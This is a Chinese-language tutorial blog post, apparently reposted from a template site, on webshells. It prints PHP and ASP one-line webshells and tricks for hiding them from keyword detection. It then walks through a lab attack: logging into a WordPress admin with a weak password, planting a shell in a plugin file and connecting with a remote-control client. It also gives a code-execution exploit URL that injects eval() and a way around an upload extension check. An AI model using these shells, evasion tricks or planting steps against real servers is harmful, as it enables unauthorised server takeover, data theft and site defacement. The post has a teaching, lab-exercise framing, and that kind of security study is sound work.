webshell 概念
web指的是在web服务器上,而shell是用脚本语言编写的脚本程序,WebShell是一种用来进行网站和服务器管理的脚本程序,webshell一般是被网站管理员用于网站管理、服务器管理等等一些用途,但是由于webshell的功能比较强大,可以上传下载文件,查看数据库,甚至可以调用一些服务器上系统的相关命令(比如创建用户,修改删除文件之类的),通常被黑客利用,黑客通过一些上传方式,将自己编写的webshell上传到web服务器的页面的目录下,攻击者通过上传WebShell获得Web服务器的管理权限,从而达到对网站服务器的渗透和控制。
从一个最简单的webshell结构可以看出其基本结构
“<?php eval($_POST[‘a’]);?>”
shell的实现需要两步:数据的传递、执行所传递的数据。
Webshell的分类
- 根据文件大小分类:大马和小马(通常指的是一句话木马,能够使用菜刀这类工具去直接连接它)
- 根据脚本名称分类:jsp、asp、aspx、php
数据传递&绕过检测
对于数据传递,我们通常的做法是使用$_GET、$_POST、$_SERVER、$_COOKIE等获取客户端数据。但这类关键词如果直接出现的话,那么可以很容易回溯到,我们有几种方案来解决这个问题:
- 利用应用本身所在框架的输入封装来得到传递的数据
- 采取某种变通的方式来绕过检测,譬如使用${"_G"."ET"}。不过这种方式也有自身的缺点,可以跟踪“${”;不过这种跟踪又可以通过“$/*a*/{”这种方式绕过(当然其又有被跟踪的可能性)。
- 使用其他数据获取方式来获取数据,譬如$_REQUEST、$GLOBALS[“_GET”]、$_FILE等。
- 人为构造语言缺陷或应用漏洞,并且这种缺陷是不易察觉的,譬如伪造管理员session等
使用方法
直接上传一句话木马举例:grade网站
找到数据库是asp格式的网站,然后,以留言板,或者发表文章的方式,把一句话
<%execute request(“value”)%>
添加到asp数据库
举例:攻防对抗 http://192.168.7.40/
后台登录页面:http://192.168.7.40/wp-login.php
admin:iloveyou登录后台,修改插件文件来插入shell
然后菜刀链接:http://192.168.7.40/wp-admin/plugin-editor.php?plugin=hello.php
找到如命令执行漏洞页面,打开客户端浏览器,填上加入了一句话的asp文件,
举例:代码执行漏洞。
Exp:/search.php?searchtype=5&tid=&area=phpinfo() /search.php?searchtype=5&tid=&area=eval($_POST[simple])
构造一句话小马,使用菜刀连接
WebShell攻击的原理
WebShell是黑客经常使用的一种恶意脚本,原理就是利用Web服务器自身的环境运行的恶意代码。从名字来看Web指的是网页服务,Shell指的是计算机程序运行的指令命令。这也揭示了WebShell的攻击方法,就是通过WebShell脚本的上传,利用网页服务程序实现操控服务器的一种方式。以PHP语言为例,只需要编写一个简单的PHP代码文件,上传到网站目录中,就可以对网站服务器进行操控,包括读取数据库、删除文件、修改主页等都可以做到。这么一个简单的语句就可以为黑客入侵打开一扇大门,让黑客可以随意地执行任意代码
Webshell上传绕过方法
(一)绕过前台脚本检测扩展名上传Webshell
当用户在客户端上传文件的时候,客户端与服务器没有进行任何的信息交互,判断上传文件的类型是前台脚本文件来判断。白名单方式检测:允许jpg,png等文件上传,如果要上传php格式文件,可以后面加一个.jpg后缀,提交后用burp进行抓包拦截,把jpg后缀删除。
举例:文章来源:https://www.toymoban.com/news/detail-654029.html
http://127.0.0.1/upload-labs/Pass-01/ burp
改后缀
文章来源地址https://www.toymoban.com/news/detail-654029.html
到了这里,关于Webshell 及检测绕过的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!